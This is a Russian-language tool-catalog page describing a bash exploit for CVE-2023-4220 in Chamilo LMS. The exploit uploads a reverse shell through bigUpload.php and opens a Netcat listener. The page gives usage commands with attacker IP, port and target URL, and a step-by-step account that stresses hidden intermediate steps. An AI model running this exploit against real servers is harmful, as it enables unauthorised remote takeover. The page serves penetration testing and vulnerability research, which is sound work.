Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Chamilo-LMS-CVE-2023-4220-Exploit — Refurbish Chamilo LMS CVE-2023-4220 эксплойт, написанный на bash | Kitploit
Инструменты/GitHubGitHub/0xdtc/chamilo-lms-cve-2023-4220-exploit
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHub0xdtc/chamilo-lms-cve-2023-4220-exploit

Chamilo-LMS-CVE-2023-4220-Exploit

Refurbish Chamilo LMS CVE-2023-4220 эксплойт, написанный на bash

Репозиторий
11 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Эксплойт Chamilo LMS CVE-2023-4220

Обзор

Этот скрипт эксплуатирует уязвимость удаленного выполнения кода (RCE) в Chamilo LMS версий ≤ v1.11.24. Уязвимость (CVE-2023-4220) существует из-за неограниченной загрузки файлов в функции bigUpload.php Chamilo LMS, что позволяет злоумышленникам загружать произвольные файлы (например, веб-шеллы) и выполнять их, что приводит к полному удаленному выполнению кода на сервере.

Этот скрипт был улучшен Divine Clown для упрощения процесса эксплуатации: он автоматически генерирует файл обратной оболочки, загружает его на цель и запускает слушатель, предоставляя атакующему прямой доступ к оболочке.


Сведения о CVE

  • Идентификатор CVE: CVE-2023-4220
  • Затронутое ПО: Chamilo LMS ≤ v1.11.24
  • Тип уязвимости: Удаленное выполнение кода (RCE)
  • Вектор атаки: Неограниченная загрузка файлов в /main/inc/lib/javascript/bigupload/inc/bigUpload.php

Возможности

  • Автоматически загружает обратную оболочку с revshells.com на основе IP-адреса и порта атакующего.
  • Загружает обратную оболочку, используя уязвимую конечную точку bigUpload.php.
  • Незаметно запускает оболочку и открывает слушатель Netcat для прямого доступа.

Улучшение от Divine Clown:

  • Все промежуточные шаги (загрузка оболочки, выгрузка и т.д.) скрыты, отображается только результирующая обратная оболочка для удобства использования.

Использование

root@kitploit:~
./CVE-2023-4220.sh -i <attacker_ip> -p <port> -h <host_link>

Параметры:

  • -i <attacker_ip>: IP-адрес атакующего для обратной оболочки.
  • -p <port>: Порт, на котором будет запущен слушатель Netcat.
  • -h <host_link>: Полный URL уязвимого экземпляра Chamilo LMS.

Пример:

root@kitploit:~
./CVE-2023-4220.sh -i 10.10.14.15 -p 9001 -h http://target-site.com

Предварительные требования

  • Netcat установлен на вашей машине.
  • Убедитесь, что целевая версия Chamilo LMS уязвима (≤ v1.11.24).
  • Наличие соответствующих разрешений для проведения тестирования на проникновение или эксплуатации.

Техническая разбивка

  1. Скрипт загружает обратную оболочку с revshells.com, динамически генерируя ее на основе IP-адреса и порта атакующего.
  2. Обратная оболочка загружается на уязвимую конечную точку bigUpload.php.
  3. Загруженный файл выполняется путем обращения к его URL на сервере.
  4. Запускается слушатель Netcat, и после активации файла устанавливается соединение обратной оболочки, предоставляя атакующему доступ к командной строке.

Юридическое предупреждение

Этот инструмент предназначен исключительно для образовательных целей и тестовых сред, где у вас есть явное разрешение на эксплуатацию уязвимостей. Несанкционированный доступ к системам является незаконным и может привести к уголовному преследованию. Авторы не несут ответственности за любое неправомерное использование или ущерб, причиненный этим скриптом.


Авторы

  • Автор оригинального эксплойта: Ziad Sakr @Ziad-Sakr
  • Улучшения и доработки: Я (Divine Clown)

Не стесняйтесь изменять README дальше, если хотите добавить дополнительную информацию или форматирование! Дайте знать, если вам потребуется что-то еще.

Скачать инструмент